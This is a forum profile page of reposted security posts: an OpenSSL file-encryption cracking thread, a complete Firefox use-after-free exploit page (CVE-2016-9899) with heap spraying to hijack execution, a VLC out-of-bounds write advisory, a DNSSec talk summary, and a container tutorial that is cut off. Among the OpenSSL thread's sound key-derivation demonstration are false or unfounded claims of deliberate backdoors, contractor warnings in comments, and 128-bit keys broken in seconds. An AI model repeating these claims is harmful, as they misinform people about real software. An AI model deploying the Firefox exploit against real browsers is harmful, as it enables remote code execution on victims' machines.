-
Posts
18725 -
Joined
-
Last visited
-
Days Won
707
Everything posted by Nytro
-
I'm glad more people are in here now. It gets much, much worse than this. The post below literally says "if you have the password, you can generate the key and open the file. The real exploit is that you don't need the password or the key to open a file. That is how serious this is. It is really bad. It is not a joke. Some of you are joining now and seeing how bad the weak KDF is that they're using. It gets much worse. The salt is not a random number. It is a side channel that leaks information about the passphrase. This reduces the entropy of the search space, so that it now becomes possible to brute force. The REAL exploit is what's going on with memory management. The ENGINE plugin literally modifies the code during the compile, so what you think it's doing isn't what's being done. It's one of the most insane things I've ever seen in my life. You can see it if you compile and then decompile the code. It's basically the same thing they did with Heartbleed, but on steroids. Same exact design pattern. Memory management is so thoroughly skewered that you might as well think of the entire thing as a secret data structure. If you really want to see what is happening here, just go look in the random number generator. It is not random. They do all sorts of stuff in the entropy pool to make it look like the time, date, process id, etc are all involved. Then they clear the buffer in a call to ENGINE (!!) which throws all of that out, pops stuff off of the secret data structure. There are race conditions in the entropy pool. There are actually even comments telling you this. There is actually a comment in the entropy pool saying something like, "we are not ambitious to provide *information-theoretic* randomness." Or, translated into plain English, "I am a contractor who is trying to warn people the random number generator is not random." There are times when they even have comments in the code telling people not to worry about valgrind complaining that uninitialized memory is being used to seed the bufer. Again, translated into plain English, "I am a contractor, and you should definitely worry about this." There is, I swear to god, a comment right in the decrypt function that basically says "PADDING ORACLE HERE." It is insane. They didn't even take it out. The whole thing is ruined. If you are just tuning in now, read the writeup posted before. Seriously, you are in for a hell of a ride. ------------------------------------------------------------------------------------------- # One error and one missing step in 5) have been corrected. # Procedure now 100% verified You can actually get the full key. This is how it works. first half of the key = MD5(password+salt) second half of the key = first half + MD5(first half+password+salt) Let's prove this step by step. openssl enc -aes-256-cbc -p -in 000svgLA.7z -out test.aes -salt -k p@ssword salt=596C09F4AFCC2B9D key=DD73502243215E39A0CDDE52CF5AB975EAA8F8DA936B35650308113E42DF8862 iv =322ACE8546EBA994AF17A1BC5DC999B1 We wan't to get the key value. Let's do it. 1.) Save the salt: perl -e 'print pack "H*", "596C09F4AFCC2B9D"' > salt 2.) Save the password: echo -n p@ssword > keyhalf 3.) Add them (password+salt): cat salt >> keyhalf 4.) Get the first half of the key: md5sum keyhalf dd73502243215e39a0cdde52cf5ab975 keyhalf Compare to the full key: DD73502243215E39A0CDDE52CF5AB975 EAA8F8DA936B35650308113E42DF8862 Checks out. So now we need the rest. We can easily get it with the information we have so far since we now know that it's = first half + MD5(first half+password+salt) 5.) Save the part of the key we already have: perl -e 'print pack "H*", "DD73502243215E39A0CDDE52CF5AB975"' > key echo -n p@ssword > password cat key > keysecond 6.) Add the password: cat password >> keysecond 7.) Add the salt: cat salt >> keysecond 8.) Get the second half of the key: md5sum keysecond eaa8f8da936b35650308113e42df8862 keysecond Compare to second half: EAA8F8DA936B35650308113E42DF8862 In step 4.) we got dd73502243215e39a0cdde52cf5ab975 In step 8.) we got eaa8f8da936b35650308113e42df8862 dd73502243215e39a0cdde52cf5ab975 eaa8f8da936b35650308113e42df8862 DD73502243215E39A0CDDE52CF5AB975 EAA8F8DA936B35650308113E42DF8862 We have the full key. We only used MD5 and didn't write a single line of code. Note that this the current version of OpenSSL. There is no patch that can fix the files that have already been encrypted. RIP OpenSSL. ------------------------------------------------------ this is crazy... ------------------------------------------------------ >the first 16 bytes of the key will be equal to MD5(password||salt) Let's test this. openssl enc -aes-256-cbc -pass pass:p@ssword -p -in 000svgLA.7z -out testfile.aes salt=C532A7E7BFFBAD69 key=9104D17FB6C06D9B0F8368D52678FD4B88DF2E244029BF068EED22DD816A5DBC iv =B08DB48DCF6CAC52C6CF040FB06A0809 python pwdsalt2key.py 'p@ssword' 'C532A7E7BFFBAD69' 9104D17FB6C06D9B0F8368D52678FD4B 9104D17FB6C06D9B0F8368D52678FD4B88DF2E244029BF068EED22DD816A5DBC pwdsalt2key.py http://gateway.glop.me/ipfs/QmbYCbZYsViLSAy7ht6iNpecyCeoTWBonsLPtHDa6bX6Ku/pwdsalt2key.py https://zerobin.net/?7ff571d39efdcd1c#uBSr6l6vCFq1EA95h3SQSmK4KVN9rAlMx/58uGRgN0o= import sys from passlib.utils.pbkdf2 import pbkdf1 from binascii import unhexlify, hexlify pwd = str(sys.argv[1]) salt = str(sys.argv[2]) out = pbkdf1(pwd, unhexlify(b''+salt), 1, 16, 'md5') print hexlify(out).decode('ascii').upper() ------------------------------------------------------ ********************************************************************* ORACLE: https://blog.cloudflare.com/yet-another-padding-oracle-in-openssl-cbc-ciphersuites/ https://github.com/FiloSottile/CVE-2016-2107 Explanation: https://blog.cloudflare.com/yet-another-padding-oracle-in-openssl-cbc-ciphersuites/ Code: https://github.com/FiloSottile/CVE-2016-2107 Internal discussion: https://www.openssl.org/news/secadv/20160503.txt Exploit: https://www.exploit-db.com/exploits/39768/ Damage control: http://web-in-security.blogspot.ca/2016/05/curious-padding-oracle-in-openssl-cve.html 'Fix': https://git.openssl.org/?p=openssl.git;a=commitdiff;h=68595c0c2886e7942a14f98c17a55a88afb6c292;hp=643e8e972e54fa358935e5f8b7f5a8be9616d56b Compiled information: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2107 ********************************************************************* BLOCKS AND SIZE: (ls -l, head -c 256) There is also this weird comment in enc.c, line 431: /* * zero the complete buffer or the string passed from the command * line bug picked up by Larry J. Hughes Jr. <hughes@indiana.edu> */ if (str == strbuf) OPENSSL_cleanse(str, SIZE); else OPENSSL_cleanse(str, str_len); The memcpy() routine is explicitly not safe if the source and destination buffers overlap. This can happen when the EVP_enc_null() cipher is used to decrypt longer text than BUF_OFFSET bytes because of this code in bio_enc.c: EVP_CipherUpdate(&(ctx->cipher), (unsigned char *)ctx->buf, &ctx->buf_len, (unsigned char *)&(ctx->buf[BUF_OFFSET]), i); It's the overwrite of the ctx->buf memory that is the problem. Saw this on a SUSE 12 SP2 machine. It is not necessarily repeatable on other machines. Valgrind also complained. https://github.com/openssl/openssl/issues/1935 You should use EVP_ENCODE_LENGTH to determine the required output buffer size: https://github.com/openssl/openssl/blob/master/include/openssl/evp.h#L458 ********************************************************************* MEMORY: (https://www.hex-rays.com/products/decompiler/) >Mem allocator isn't actually an allocator, it's LIFO system that allows the devs to be sloppy and access "already free()d memory", I notice that they alloc in EVP_BytesToKey, whereas LibreSSL does not. >double free https://github.com/guidovranken/openssl-x509-vulnerabilities http://seclists.org/fulldisclosure/2016/Oct/62 There are many other instances of double frees in the code. ********************************************************************* 3SAT: (https://github.com/msoos/cryptominisat) (http://baldur.iti.kit.edu/sat-competition-2016/solvers/main/) >You need to do linear correleation attack on the bit vectors and other annoying things. You can reduce entropy down to 64+32 bits and then its within brute force range with ASIC. >For 3-sat Solver you just download it off of github. There are dozens. >The problem is getting the md5 and aes circuit into 3-SAT, CNF form. You may need to take the C code for the decryption functions and md5 hashing functions, then compile it to verilog. See if there is a way. >You have to represent the hash function as a circuit in CNF. >128 Bit is breakable in 40 seconds with 3-SAT attack. Its not breakable with brute force. ********************************************************************* MD5 PBKDF1: (http://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha1-and-md5-hashed-passwords/) (https://github.com/qsantos/rainbow) >"The first 16 bytes are actually derived using PBKDF1 as defined in PKCS#5 v1.5. The next 16 bytes would be MD5(PBKDF1(PASSWORD, SALT) || PASSWORD || SALT) and the IV would be MD5(MD5(PBKDF1(PASSWORD, SALT) || PASSWORD || SALT) || PASSWORD || SALT)" >PBKDF1(PASSWORD, SALT) = MD5(PASSWORD || SALT), where || is concatenation ^^There is an idea that this decimates the entropy to 2^128, assuming each of the first 128 passphrases hashes to a unique MD5. However, it's tricky, because you have to find the right preimage to compute the full key, as well as the IV. However, if you have some way to identify that you have the first 128 bits right, then finding collisions for it is easy, since a collision attack on MD5 exists. Either way, this is pretty weak and it's crazy that it's there. > EVP_BytesToKey uses an outrageously weak KDF (basically MD5 salted and iterated a couple times), and drops the entropy down to 128 bits at least. >The process by which the password and salt are turned into the key and IV is not documented, but a look at the source code shows that it calls the OpenSSL-specific EVP_BytesToKey() function, which uses a custom key derivation function with some repeated hashing. This is a non-standard and not-well vetted construct (!) which relies on the MD5 hash function of dubious reputation (!!); that function can be changed on the command-line with the undocumented -md flag (!!!); the "iteration count" is set by the enc command to 1 and cannot be changed (!!!!). This means that the first 16 bytes of the key will be equal to MD5(password||salt), and that's it. >I will tell you a secret. >To decrypt the insurance file. Make sure to archive this before it disappears. >The EVP_BytesToKey key derivative algorithm uses md5. It is trivial to break the key for the first block. ********************************************************************* CONTENT: (binwalk, diff, comm, head/tail -c) >See if the filename, file contents, or choice of key or IV changes the salt. (I believe I saw the key choice did not change the salt) Download: http://gateway.glop.me/ipfs/QmZudb4s2nF5JgdeFA1nKzs6MtvaPr58rR4LzddZqYir3s/evp_test.py It recreates EVP_BytesToKey completely outside of OpenSSL. Example: python evp_test.py md5 'p@ssword' '64 97 22 63 0B 61 9D 74' salt=649722630B619D74 key=F6EEA040C6BDD0EF1429C4CF4FE09FD3EA1C9BDE96B6B41DBFF838E408628BBE iv=576F54891CADC222492E038F8ECE557A ********************************************************************* AES: (http://www.lifl.fr/~bouillag/implementation.html) http://gateway.glop.me/ipfs/QmUUm47AkBuv2atQVLBPjTrVhaXQRDj9bNTqErkaP2TNwB/papers.zip http://gateway.glop.me/ipfs/QmZHXz3g6LBNGYknFMLZbtdTawTNDt8dQByauk5fmFLb2k/aestools.zip https://mega.nz/#!cI9jUAoQ!VGJnhIlTU5YBhIXTNLBfhasER6qxfsD_ho3PO_U5oSs https://mega.nz/#!0BN3lRYT!G172BViFAInD2gTOsyZOZ56zHC4nNA1DHHwP7RliT6U If people are saying the first block of the insurance files contains "runs of zeros," then here's what that looks like. Suppose that AES(block, key) encrypts a block with a key. Then the first block looks like the following equation: AES(IV,key) ^ ciphertext = plaintext Where ^ is XOR. Now: if the plaintext were ALL zeros, that would mean AES(IV,key) ^ ciphertext = 0000000… which means AES(IV,key) = ciphertext But, the IV and key are generated in completely deterministic fashion from the key and the salt. And we have the salt. So that first function really becomes F(passphrase) = ciphertext for a certain F. ********************************************************************* ------------------------------------------------------ openssl enc -aes-256-cbc -pass pass:p@ssword -p -d -in testfile.aes -out test1 salt=2F140A2A667109B6 key=460EBADE3CCC9AD2E6D223EB119435F947CC802044295EA90793AEC981AE3183 iv =20E75E1E60ADF1C345E420EB9CD935BA openssl enc -aes-256-cbc -pass pass:WRONG_PASSWORD -p -d -in testfile.aes -out test2 salt=2F140A2A667109B6 key=C44D5867FFE37E08397DE9A4CC8058EAED59C20EB66759D7F78C960C2B91A200 iv =5F5A6DFC5CCF0A50AD7502BD047076CE bad decrypt 140687120832160:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:539: openssl enc -aes-256-cbc -pass pass:WRONG_PASSWORDxxxxxxx -p -d -in testfile.aes -out test2b salt=2F140A2A667109B6 key=4D44D8C33DD754B64F460A69DA4E4F722678CBF04C44A03C7DB2B5AE4499C9E4 iv =4EABEE050D7D4C29F83B7134BE9FDF21 bad decrypt 140683261372064:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:539: head -c 2560 testfile.aes > snippet openssl enc -aes-256-cbc -pass pass:p@ssword -p -d -in snippet -out test3 salt=2F140A2A667109B6 key=460EBADE3CCC9AD2E6D223EB119435F947CC802044295EA90793AEC981AE3183 iv =20E75E1E60ADF1C345E420EB9CD935BA bad decrypt 140591540508320:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:539: openssl enc -aes-256-cbc -pass pass:WRONG_PASSWORD -p -d -in snippet -out test4 salt=2F140A2A667109B6 key=C44D5867FFE37E08397DE9A4CC8058EAED59C20EB66759D7F78C960C2B91A200 iv =5F5A6DFC5CCF0A50AD7502BD047076CE bad decrypt 140213217490592:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:539: ls -l 5083502 test1 5083488 test2 5083488 test2b 2528 test3 2528 test4 strings test1 > s1 strings test2 > s2 strings test2b > s2b strings test3 > s3 strings test4 > s4 strings testfile.aes > as strings snippet > ss ls -l s1 352345 s2 351306 s2b 352104 s3 153 s4 156 ss 186 as 352191 binwalk test1 DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 7-zip archive data, version 0.3 binwalk test2 DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- binwalk test2b DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- binwalk test3 DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 7-zip archive data, version 0.3 binwalk test4 DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- binwalk snippet DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 OpenSSL encryption, salted, salt: 0x2F140A2A667109B6 binwalk testfile.aes DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 OpenSSL encryption, salted, salt: 0x2F140A2A667109B6 head -c 8 test1 7z' head -c 8 test2 `@R head -c 8 test2b nZ head -c 8 test3 7z' head -c 8 test4 `@R tail -c 8 test1 W[ tail -c 8 test2 a ܹ tail -c 8 test3 !H\ tail -c 8 test4 O$ tail -c 8 snippet ( tail -c 8 testfile.aes sQ hachoir-subfile test1 [+] Start search on 5083502 bytes (4.8 MB) [+] File at 0 size=5083502 (4.8 MB): Compressed archive in 7z format [+] File at 4139258 size=27418666 (26.1 MB): MS-DOS executable [+] End of search -- offset=5083502 (4.8 MB) hachoir-subfile test2 [+] Start search on 5083488 bytes (4.8 MB) [+] File at 1605181 size=18645165 (17.8 MB): MS-DOS executable [+] File at 3773184 size=15678389 (15.0 MB): MS-DOS executable [+] File at 4786234 size=2034059 (1.9 MB): MS-DOS executable [+] End of search -- offset=5083488 (4.8 MB) hachoir-subfile test2b [+] Start search on 5083488 bytes (4.8 MB) [+] End of search -- offset=5083488 (4.8 MB) hachoir-subfile test3 [+] Start search on 2528 bytes (2528 bytes) [+] File at 0 size=5083502 (4.8 MB): Compressed archive in 7z format [+] End of search -- offset=2528 (2528 bytes) hachoir-subfile test4 [+] Start search on 2528 bytes (2528 bytes) [+] End of search -- offset=2528 (2528 bytes) hachoir-subfile snippet [+] Start search on 2560 bytes (2560 bytes) [+] End of search -- offset=2560 (2560 bytes) hachoir-subfile testfile.aes [+] Start search on 5083520 bytes (4.8 MB) [+] File at 1292169 size=18091181 (17.3 MB): MS-DOS executable [+] File at 3813667 size=11944255 (11.4 MB): MS-DOS executable [+] End of search -- offset=5083520 (4.8 MB) ------------------------------------------------------ Alright - the holidays are over. We laughed, we cried, we did lots of math. Time to finish the job and bring it all home. In this thread, we will start to make this concrete with OpenSSL. Applying some of the ideas here, what we really want to do with OpenSSL is decrypt a file with a random key (or passphrase), and then let it fail. But, unfortunately, OpenSSL leaks "information" about why it fails (padding oracle, etc). So, if you test a bunch of random passwords, you can collect this leaked information, and use it to narrow down the search space (!!!!) for the next round of tests. THUS, YOU NEVER HAVE TO BRUTE FORCE THE ENTIRE SEARCH SPACE. That is the big idea. You instead brute force a small random "representative sample" of the search space, gather the leaked information as a set of experimental "results," and adjust your probability distribution (and as a result, the entropy) accordingly, use that to rule out HUGE sections of the search space in the next round of tests, then repeat and iterate towards a solution. Rather than try to re-derive the math here from scratch, let's try a concrete example. The following 7z on archive.org is about 5 MB, completely public domain under CC0, and contains SVGs of all the Tic-Tac-Toe games (as used on Wikipedia): Details: https://archive.org/details/000svgLA.7z Direct Download: https://archive.org/download/000svgLA.7z/000svgLA.7z Now, so that we can ALL have the same file, simply do the following commands: $ wget https://archive.org/download/000svgLA.7z/000svgLA.7z ... $ openssl enc -aes-256-cbc -pass pass:p@ssword -S 2F140A2A667109B6 -p -in 000svgLA.7z -out testfile.aes salt=2F140A2A667109B6 key=460EBADE3CCC9AD2E6D223EB119435F947CC802044295EA90793AEC981AE3183 iv =20E75E1E60ADF1C345E420EB9CD935BA $ sha256sum -b testfile.aes b5210324b21f88e83601d8aa2b940622258c3aab459d9476570f9ec427157574 *testfile.aes And now we're all on the same page here. The last line is just to confirm you have the right file. So, now we want to take all of this stuff and do some tests. Here's three sample "Bad Decrypts" with the password set to "WRONG_PASSWORD": $ openssl enc -aes-256-cbc -pass pass:WRONG_PASSWORD -p -d -in testfile.aes -out testdecrypt.7z salt=2F140A2A667109B6 key=C44D5867FFE37E08397DE9A4CC8058EAED59C20EB66759D7F78C960C2B91A200 iv =5F5A6DFC5CCF0A50AD7502BD047076CE bad decrypt 140341122025112:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:529: $ openssl enc -aes-256-cbc -pass pass:WRONG_PASSWORD -p -d -in testfile.aes -out testdecrypt.7z salt=2F140A2A667109B6 key=C44D5867FFE37E08397DE9A4CC8058EAED59C20EB66759D7F78C960C2B91A200 iv =5F5A6DFC5CCF0A50AD7502BD047076CE bad decrypt 140164202464920:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:529: $ openssl enc -aes-256-cbc -pass pass:WRONG_PASSWORD -p -d -in testfile.aes -out testdecrypt.7z salt=2F140A2A667109B6 key=C44D5867FFE37E08397DE9A4CC8058EAED59C20EB66759D7F78C960C2B91A200 iv =5F5A6DFC5CCF0A50AD7502BD047076CE bad decrypt 140193671071384:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:529: Note the three numbers we get: 1. 140341122025112 2. 140164202464920 3. 140193671071384 You can see it's different every time, so some randomness is involved here. This number is, also, what the padding oracle is mysteriously spitting out. The question is, what the hell does this number mean, and how do we interpret these results? Sursa: https://www.exploit-db.com/papers/41019/
-
<!DOCTYPE html> <html> <head> <!-- <meta http-equiv="refresh" content="1"/> --> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="Expires" content="0" /> <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" /> <meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" /> <meta http-equiv="Pragma" content="no-cache" /> <style type="text/css"> body{ background-color:lime; font-color:red; }; </style> <script type='text/javascript'></script> <script type="text/javascript" language="JavaScript"> /* * Mozilla Firefox < 50.1.0 Use-After-Free POC * Author: Marcin Ressel * Date: 13.01.2017 * Vendor Homepage: www.mozilla.org * Software Link: https://ftp.mozilla.org/pub/firefox/releases/50.0.2/ * Version: < 50.1.0 * Tested on: Windows 7 (x64) Firefox 32 && 64 bit * CVE: CVE-2016-9899 ************************************************* * (b1c.5e0): Access violation - code c0000005 (first chance) * First chance exceptions are reported before any exception handling. * This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\xul.dll - * eax=0f804c00 ebx=00000000 ecx=003be0c8 edx=4543484f esi=003be0e4 edi=06c71580 * eip=6d7cc44c esp=003be0b8 ebp=003be0cc iopl=0 nv up ei pl nz na pe nc * cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 * xul!mozilla::net::LoadInfo::AddRef+0x3dd41: * 6d7cc44c ff12 call dword ptr [edx] ds:002b:4543484f=???????? * 0:000> dd eax * 0f804c00 4543484f 91919191 91919191 91919191 * 0f804c10 91919191 91919191 91919191 91919191 * 0f804c20 91919191 91919191 91919191 91919191 * 0f804c30 91919191 91919191 91919191 91919191 * 0f804c40 91919191 91919191 91919191 91919191 * 0f804c50 91919191 91919191 91919191 91919191 * 0f804c60 91919191 91919191 91919191 91919191 * 0f804c70 91919191 91919191 91919191 91919191 * */ var doc = null; var cnt = 0; function m(blocks,size) { var arr = []; for(var i=0;i<blocks;i++) { arr[i] = new Array(size); for(var j=0;j<size;j+=2) { arr[i][j] = 0x41414141; arr[i][j+1] = 0x42424242; } } return arr; } function handler() { //free if(cnt > 0) return; doc.body.appendChild(document.createElement("audio")).remove(); m(1024,1024); ++cnt; } function trigger() { if(cnt > 0) { var pl = new Array(); doc.getElementsByTagName("*")[0].removeEventListener("DOMSubtreeModified",handler,false); for(var i=0;i<4096;i++) { //replace pl[i]=new Uint8Array(1000); pl[i][0] = 0x4F; pl[i][1] = 0x48; pl[i][2] = 0x43; pl[i][3] = 0x45; //eip for(var j=4;j<(1000) - 4;j++) pl[i][j] = 0x91; // pl[i] = document.createElement('media'); //document.body.appendChild(pl[i]); } window.pl = pl document.getElementById("t1").remove(); //re-use } } function testcase() { var df = m(4096,1000); document.body.setAttribute('df',df); doc = document.getElementById("t1").contentWindow.document; doc.getElementsByTagName("*")[0].addEventListener("DOMSubtreeModified",handler,false); doc.getElementsByTagName("*")[0].style = "ANNNY"; setInterval("trigger();",1000); } </script> <title>Firefox < 50.1.0 Use After Free (CVE-2016-9899) </title> </head> <body onload='testcase();'> <iframe src='about:blank' id='t1' width="100%"></iframe> </body> </html> Sursa: https://www.exploit-db.com/exploits/41042/
-
- 1
-
-
In modules/codec/adpcm.c, VLC can be made to perform an out-of-bounds write with user-controlled input. The function DecodeAdpcmImaQT at adpcm.c:595 allocates a buffer which is filled with bytes from the input stream. However, it does not check that the number of channels in the input stream is less than or equal to the size of the buffer, resulting in an out-of-bounds write. The number of channels is clamped at <= 5. adpcm_ima_wav_channel_t channel[2]; ... for( i_ch = 0; i_ch < p_dec->fmt_in.audio.i_channels; i_ch++ ) { channel[i_ch].i_predictor = (int16_t)((( ( p_buffer[0] << 1 )|( p_buffer[1] >> 7 ) ))<<7); channel[i_ch].i_step_index = p_buffer[1]&0x7f; ... The mangling of the input p_buffer above and in AdpcmImaWavExpandNibble() makes this difficult to exploit, but there is a potential for remote code execution via a malicious media file. POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41025.mov Sursa: https://www.exploit-db.com/exploits/41025/
-
DNSSec Explained! Dan Benway BSides Columbus Ohio 2017 DNSSec is yet neither widely deployed nor well understood, but there is already clear and present need for its use. Just like HTTPS, DNSSec is becoming more common, and will eventually become required. In this session I will diagrammatically show how DNSSec works. We’ll look at DNS functionality, DNS referrals, spoofing and man-in-the-middle attacks, asymmetric key cryptography (public key cryptography), digital signatures, zone signing keys, key signing keys, DS records, and more. Daniel L. Benway has been an IT professional since 1993, working in assistive technology, software development, enterprise infrastructure, and security. He holds a Bachelor of Science in Computer Science from The Thomas J. Watson School of Engineering and Applied Science at Binghamton University, as well as certifications from Microsoft, Cisco, CompTIA, and IBM/Lotus. Currently Daniel is an Active Directory, Windows infrastructure, and PKI specialist in Columbus, Ohio. You can learn more about Daniel from his IT blog or LinkedIn. Sursa: http://www.irongeek.com/i.php?page=videos/bsidescolumbus2017/bsides-columbus09-dnssec-explained-dan-benway
-
- 2
-
-
Containers from Scratch Posted on January 7, 2017 This is write up for talk I gave at CAT BarCamp, an awesome unconference at Portland State University. The talk started with the self-imposed challenge “give an intro to containers without Docker or rkt.” Often thought of as cheap VMs, containers are just isolated groups of processes running on a single host. That isolation leverages several underlying technologies built into the Linux kernel: namespaces, cgroups, chroots and lots of terms you’ve probably heard before. So, let’s have a little fun and use those underlying technologies to build our own containers. On today’s agenda: setting up a file system chroot unshare nsenter bind mounts cgroups capabilities Container file systems Container images, the thing you download from the internet, are literally just tarballs (or tarballs in tarballs if you’re fancy). The least magic part of a container are the files you interact with. For this post I’ve build a simple tarball by stripping down a Docker image. The tarball holds something that looks like a Debian file system and will be our playground for isolating processes. $ wget https://github.com/ericchiang/containers-from-scratch/releases/download/v0.1.0/rootfs.tar.gz $ sha256sum rootfs.tar.gz c79bfb46b9cf842055761a49161831aee8f4e667ad9e84ab57ab324a49bc828c rootfs.tar.gz First, explode the tarball and poke around. $ # tar needs sudo to create /dev files and setup file ownership $ sudo tar -zxf rootfs.tar.gz $ ls rootfs bin dev home lib64 mnt proc run srv tmp var boot etc lib media opt root sbin sys usr $ ls -al rootfs/bin/ls -rwxr-xr-x. 1 root root 118280 Mar 14 2015 rootfs/bin/ls The resulting directory looks an awful lot like a Linux system. There’s a bin directory with executables, an etc with system configuration, a lib with shared libraries, and so on. Actually building this tarball is an interesting topic, but one we’ll be glossing over here. For an overview, I’d strongly recommend the excellent talk “Minimal Containers” by my coworker Brian Redbeard. chroot The first tool we’ll be working with is chroot. A thin wrapper around the similarly named syscall, it allows us to restrict a process’ view of the file system. In this case, we’ll restrict our process to the “rootfs” directory then exec a shell. Once we’re in there we can poke around, run commands, and do typical shell things. $ sudo chroot rootfs /bin/bash root@localhost:/# ls / bin dev home lib64 mnt proc run srv tmp var boot etc lib media opt root sbin sys usr root@localhost:/# which python /usr/bin/python root@localhost:/# /usr/bin/python -c 'print "Hello, container world!"' Hello, container world! root@localhost:/# It’s worth noting that this works because of all the things baked into the tarball. When we execute the Python interpreter, we’re executing rootfs/usr/bin/python, not the host’s Python. That interpreter depends on shared libraries and device files that have been intentionally included in the archive. Speaking of applications, instead of shell we can run one in our chroot. $ sudo chroot rootfs python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ... If you’re following along at home, you’ll be able to view everything the file server can see at http://localhost:8000/. Creating namespaces with unshare How isolated is this chrooted process? Let’s run a command on the host in another terminal. $ # outside of the chroot $ top Sure enough, we can see the top invocation from inside the chroot. $ sudo chroot rootfs /bin/bash root@localhost:/# mount -t proc proc /proc root@localhost:/# ps aux | grep top 1000 24753 0.1 0.0 156636 4404 ? S+ 22:28 0:00 top root 24764 0.0 0.0 11132 948 ? S+ 22:29 0:00 grep top Better yet, our chrooted shell is running as root, so it has no problem killing the topprocess. root@localhost:/# pkill top So much for containment. This is where we get to talk about namespaces. Namespaces allow us to create restricted views of systems like the process tree, network interfaces, and mounts. Creating namespace is super easy, just a single syscall with one argument, unshare. The unshare command line tool gives us a nice wrapper around this syscall and lets us setup namespaces manually. In this case, we’ll create a PID namespace for the shell, then execute the chroot like the last example. $ sudo unshare -p -f --mount-proc=$PWD/rootfs/proc \ chroot rootfs /bin/bash root@localhost:/# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 20268 3240 ? S 22:34 0:00 /bin/bash root 2 0.0 0.0 17504 2096 ? R+ 22:34 0:00 ps aux root@localhost:/# Having created a new process namespace, poking around our chroot we’ll notice something a bit funny. Our shell thinks its PID is 1?! What’s more, we can’t see the host’s process tree anymore. Entering namespaces with nsenter A powerful aspect of namespaces is their composability; processes may choose to separate some namespaces but share others. For instance it may be useful for two programs to have isolated PID namespaces, but share a network namespace (e.g. Kubernetes pods). This brings us to the setns syscall and the nsentercommand line tool. Let’s find the shell running in a chroot from our last example. $ # From the host, not the chroot. $ ps aux | grep /bin/bash | grep root ... root 29840 0.0 0.0 20272 3064 pts/5 S+ 17:25 0:00 /bin/bash The kernel exposes namespaces under /proc/(PID)/ns as files. In this case, /proc/29840/ns/pid is the process namespace we’re hoping to join. $ sudo ls -l /proc/29840/ns total 0 lrwxrwxrwx. 1 root root 0 Oct 15 17:31 ipc -> 'ipc:[4026531839]' lrwxrwxrwx. 1 root root 0 Oct 15 17:31 mnt -> 'mnt:[4026532434]' lrwxrwxrwx. 1 root root 0 Oct 15 17:31 net -> 'net:[4026531969]' lrwxrwxrwx. 1 root root 0 Oct 15 17:31 pid -> 'pid:[4026532446]' lrwxrwxrwx. 1 root root 0 Oct 15 17:31 user -> 'user:[4026531837]' lrwxrwxrwx. 1 root root 0 Oct 15 17:31 uts -> 'uts:[4026531838]' The nsenter command provides a wrapper around setns to enter a namespace. We’ll provide the namespace file, then run the unshare to remount /proc and chroot to setup a chroot. This time, instead of creating a new namespace, our shell will join the existing one. $ sudo nsenter --pid=/proc/29840/ns/pid \ unshare -f --mount-proc=$PWD/rootfs/proc \ chroot rootfs /bin/bash root@localhost:/# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 20272 3064 ? S+ 00:25 0:00 /bin/bash root 5 0.0 0.0 20276 3248 ? S 00:29 0:00 /bin/bash root 6 0.0 0.0 17504 1984 ? R+ 00:30 0:00 ps aux Having entered the namespace successfully, when we run ps in the second shell (PID 5) we see the first shell (PID 1). Getting around chroot with mounts When deploying an “immutable” container it often becomes important to inject files or directories into the chroot, either for storage or configuration. For this example, we’ll create some files on the host, then expose them read-only to the chrooted shell using mount. First, let’s make a new directory to mount into the chroot and create a file there. $ sudo mkdir readonlyfiles $ echo "hello" > readonlyfiles/hi.txt Next, we’ll create a target directory in our container and bind mount the directory providing the -o ro argument to make it read-only. If you’ve never seen a bind mount before, think of this like a symlink on steroids. $ sudo mkdir -p rootfs/var/readonlyfiles $ sudo mount --bind -o ro $PWD/readonlyfiles $PWD/rootfs/var/readonlyfiles The chrooted process can now see the mounted files. $ sudo chroot rootfs /bin/bash root@localhost:/# cat /var/readonlyfiles/hi.txt hello However, it can’t write them. root@localhost:/# echo "bye" > /var/readonlyfiles/hi.txt bash: /var/readonlyfiles/hi.txt: Read-only file system Though a pretty basic example, it can actually be expanded quickly for things like NFS, or in-memory file systems by switching the arguments to mount. Use umount to remove the bind mount (rm won’t work). $ sudo umount $PWD/rootfs/var/readonlyfiles cgroups cgroups, short for control groups, allow kernel imposed isolation on resources like memory and CPU. After all, what’s the point of isolating processes they can still kill neighbors by hogging RAM? The kernel exposes cgroups through the /sys/fs/cgroup directory. If your machine doesn’t have one you may have to mount the memory cgroup to follow along. $ ls /sys/fs/cgroup/ blkio cpuacct cpuset freezer memory net_cls,net_prio perf_event systemd cpu cpu,cpuacct devices hugetlb net_cls net_prio pids For this example we’ll create a cgroup to restrict the memory of a process. Creating a cgroup is easy, just create a directory. In this case we’ll create a memory group called “demo”. Once created, the kernel fills the directory with files that can be used to configure the cgroup. $ sudo su # 